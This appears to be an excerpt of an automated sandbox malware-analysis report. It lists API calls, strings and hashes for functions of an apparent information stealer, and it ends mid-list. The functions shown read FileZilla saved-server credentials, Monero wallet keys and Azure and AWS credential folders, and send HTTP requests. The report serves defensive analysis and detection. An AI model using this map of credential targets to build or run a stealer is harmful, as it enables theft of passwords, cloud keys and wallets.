                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Function 00D403B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00D50DBF,00D50DBE,00D50DBB,00D50DBA), ref: 00D404C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D404C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D404E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D404F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D4052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D4053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00D40579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D40587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D405C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D405D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D40662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D4067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D40692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D406AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D406C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00D406D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00D406E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D406F3
                                      • lstrcat.KERNEL32(?,00D51770), ref: 00D40702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D40715
                                      • lstrcat.KERNEL32(?,00D51774), ref: 00D40724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00D40733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D40746
                                      • lstrcat.KERNEL32(?,00D51780), ref: 00D40755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00D40764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D40777
                                      • lstrcat.KERNEL32(?,00D51790), ref: 00D40786
                                      • lstrcat.KERNEL32(?,00D51794), ref: 00D40795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB7), ref: 00D407EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 20d008aecb714d7d6fcc15812f29234d63ac6096a998c793aeb89be8f59be73d
                                      • Instruction ID: 2fca80c06514d6d9231a7c4d5f5caad778c39511a44684f0f4989bf6d10a9602
                                      • Opcode Fuzzy Hash: 20d008aecb714d7d6fcc15812f29234d63ac6096a998c793aeb89be8f59be73d
                                      • Instruction Fuzzy Hash: 1DD13F75940208ABDF14EBF8DD96EEE7739EF18301F008558F542A6095EF79AA08CB71
                                      Function 00D359B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D35A48
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D35A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D35BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0167E868,00000000,?,0167A3C0,00000000,?,00D51B4C), ref: 00D35EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00D35ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D35EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D35EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00D35EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00D35F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D35F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00D35F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D35F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D35F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36000
                                      • InternetCloseHandle.WININET(00000000), ref: 00D3600D
                                      • HttpOpenRequestA.WININET(00000000,0167E7A8,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D35C48
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00D36017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: 524f66935ae3a56416c89219bffe98f7318ac0b6f072183473898f89b3152700
                                      • Instruction ID: a2bcf02a7cafa0610b6d67dd8e7dd314fb891cf2244a6e57222cb7be8d37fa41
                                      • Opcode Fuzzy Hash: 524f66935ae3a56416c89219bffe98f7318ac0b6f072183473898f89b3152700
                                      • Instruction Fuzzy Hash: 5E120C72960528ABDB15EBA4DCA6FEEB379FF14700F004199F10662091EF746A48CF75
                                      Function 00D3CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D3D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D308
                                      • lstrcat.KERNEL32(?,00D51570), ref: 00D3D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D32A
                                      • lstrcat.KERNEL32(?,00D51574), ref: 00D3D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D34C
                                      • lstrcat.KERNEL32(?,00D51578), ref: 00D3D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D36E
                                      • lstrcat.KERNEL32(?,00D5157C), ref: 00D3D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D390
                                      • lstrcat.KERNEL32(?,00D51580), ref: 00D3D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D3B2
                                      • lstrcat.KERNEL32(?,00D51584), ref: 00D3D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D3D3D4
                                      • lstrcat.KERNEL32(?,00D51588), ref: 00D3D3E3
                                        • Part of subcall function 00D4AB30: lstrlen.KERNEL32(00D34F55,?,?,00D34F55,00D50DDF), ref: 00D4AB3B
                                        • Part of subcall function 00D4AB30: lstrcpy.KERNEL32(00D50DDF,00000000), ref: 00D4AB95
                                      • lstrlen.KERNEL32(?), ref: 00D3D42A
                                      • lstrlen.KERNEL32(?), ref: 00D3D439
                                        • Part of subcall function 00D4AD80: StrCmpCA.SHLWAPI(00000000,00D51568,00D3D2A2,00D51568,00000000), ref: 00D4AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D3D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 29c0f1b4b0d9aa299fccd3d0816f0d00b9a338e72a3ff362192971ac07389916
                                      • Instruction ID: 14a37afadf7048da0b9b26106eff9b7d75ec5a84a94781d15dd2ec83c119b59e
                                      • Opcode Fuzzy Hash: 29c0f1b4b0d9aa299fccd3d0816f0d00b9a338e72a3ff362192971ac07389916
                                      • Instruction Fuzzy Hash: 0EE14C75950108ABDB15EBA8DDA6EEE7339EF14301F004158F546B6091EF3ABE08CB72
                                      Function 00D3CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0167CF18,00000000,?,00D51544,00000000,?,?), ref: 00D3CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D3CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D3CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D3CBD9
                                      • StrStrA.SHLWAPI(?,0167CDF8,00D50B56), ref: 00D3CBF7
                                      • StrStrA.SHLWAPI(00000000,0167CE70), ref: 00D3CC1E
                                      • StrStrA.SHLWAPI(?,0167D8E0,00000000,?,00D51550,00000000,?,00000000,00000000,?,01679238,00000000,?,00D5154C,00000000,?), ref: 00D3CDA2
                                      • StrStrA.SHLWAPI(00000000,0167D780), ref: 00D3CDB9
                                        • Part of subcall function 00D3C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C971
                                        • Part of subcall function 00D3C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C97C
                                      • StrStrA.SHLWAPI(?,0167D780,00000000,?,00D51554,00000000,?,00000000,01679108), ref: 00D3CE5A
                                      • StrStrA.SHLWAPI(00000000,01678FE8), ref: 00D3CE71
                                        • Part of subcall function 00D3C920: lstrcat.KERNEL32(?,00D50B47), ref: 00D3CA43
                                        • Part of subcall function 00D3C920: lstrcat.KERNEL32(?,00D50B4B), ref: 00D3CA57
                                        • Part of subcall function 00D3C920: lstrcat.KERNEL32(?,00D50B4E), ref: 00D3CA78
                                      • lstrlen.KERNEL32(00000000), ref: 00D3CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00D3CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 61d43442a9724a2a6a5d0e0fe048cc08dcbc3f23809cb7941aaa8d87b20971a0
                                      • Instruction ID: da4ad6303b5be4b5c8bbec43ebcd739c00d5d2e61ca967825b718af82580eaa0
                                      • Opcode Fuzzy Hash: 61d43442a9724a2a6a5d0e0fe048cc08dcbc3f23809cb7941aaa8d87b20971a0
                                      • Instruction Fuzzy Hash: 71E11772950108ABDB15EBA8DCA2FEEB779EF58300F004199F14663192EF356A49CF71
                                      Function 00D484B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,0167B1C8,00000000,00020019,00000000,00D505BE), ref: 00D48534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D485B6
                                      • wsprintfA.USER32 ref: 00D485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D48629
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 8f23db9cb5a23d3b01f67c8036a4b59d3acffb15069eddd7cfb0229b2af255ed
                                      • Instruction ID: 56886161ef75f2fed0e917c13297e20a7af24cee03610e17e05341cec5f0654f
                                      • Opcode Fuzzy Hash: 8f23db9cb5a23d3b01f67c8036a4b59d3acffb15069eddd7cfb0229b2af255ed
                                      • Instruction Fuzzy Hash: F3811A71950118ABEB24DF54CD91FEAB7B9FB48340F1082D9E149A6180DF75AB88CFB0
                                      Function 00D44FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D45000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00D4501D
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44B7C
                                        • Part of subcall function 00D44B60: FindFirstFileA.KERNEL32(?,?), ref: 00D44B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D4508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00D450A9
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D44BC1
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44BD7
                                        • Part of subcall function 00D44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44DCD
                                        • Part of subcall function 00D44B60: FindClose.KERNEL32(000000FF), ref: 00D44DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D45118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D45135
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44C00
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D508D3), ref: 00D44C15
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44C32
                                        • Part of subcall function 00D44B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00D44C6E
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,0167E888), ref: 00D44C9A
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,00D50FE0), ref: 00D44CAC
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,?), ref: 00D44CC0
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,00D50FE4), ref: 00D44CD2
                                        • Part of subcall function 00D44B60: lstrcat.KERNEL32(?,?), ref: 00D44CE6
                                        • Part of subcall function 00D44B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00D44CFC
                                        • Part of subcall function 00D44B60: DeleteFileA.KERNEL32(?), ref: 00D44D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
